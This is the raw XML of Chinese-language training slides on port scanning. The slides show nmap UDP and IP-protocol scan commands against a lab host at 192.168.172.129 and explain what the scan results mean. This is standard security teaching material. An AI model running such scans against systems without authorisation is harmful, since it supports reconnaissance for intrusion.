              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="文本框 115"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5616575" y="932498"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>使用“nmap -sU 192.168.172.129”命令对目标主机进行自定义UDP端口扫描，如图2-2-59所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5616575" y="1577658"/>
            <a:ext cx="5276850" cy="2743200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117" name="文本框 116"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5616575" y="4320858"/>
            <a:ext cx="5080000" cy="1753235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-59 namp UDP端口扫描结果</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l"/>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>在使用UDP 协议对端口进行扫描时，结果是open、closed和 filtered三者中的一个。通过扫描结果可以发现UDP端的开放情况是137端口开放，其他端口的状态中filtered表示被过滤的。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行IP协议的主机端口扫描并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤十</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>10</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="1285240" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="397E9E"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Century Gothic" panose="020B0502020202020204"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="313436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7pPr>
            <a:lvl8pPr marL="3616325"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8pPr>
            <a:lvl9pPr marL="4098290" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1900" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 端口扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5355590" y="710565"/>
            <a:ext cx="5080000" cy="2584450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.使用“nmap -sO 192.168.172.129”命令对目标主机进行IP协议扫描，如图2-2-60所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>严格来说，IP协议扫描并不是一种端口扫描的方式，它会确定目标端口的协议类型。它扫描的是P协议号，尽管它扫描的是IP协议号并不是TCP端口或 UDP端口，但是可以使用-p 参数去选择需要扫描的协议号。因为这种扫描它并不是在UDP报文的端口域上循环，而是在服务器IP协议域上循环，它会发送空的P报文头。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5355590" y="3295015"/>
            <a:ext cx="5276850" cy="2476500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="文本框 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5355590" y="5771515"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-60 nmap IP协议扫描</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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tags/tag1.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:7074,&quot;width&quot;:7027}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag10.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag100.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1000.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1001.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1002.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1003.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1004.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1005.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1006.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1007.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1008.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1009.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag101.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1010.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1011.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1012.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1013.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1014.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1015.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1016.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1017.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
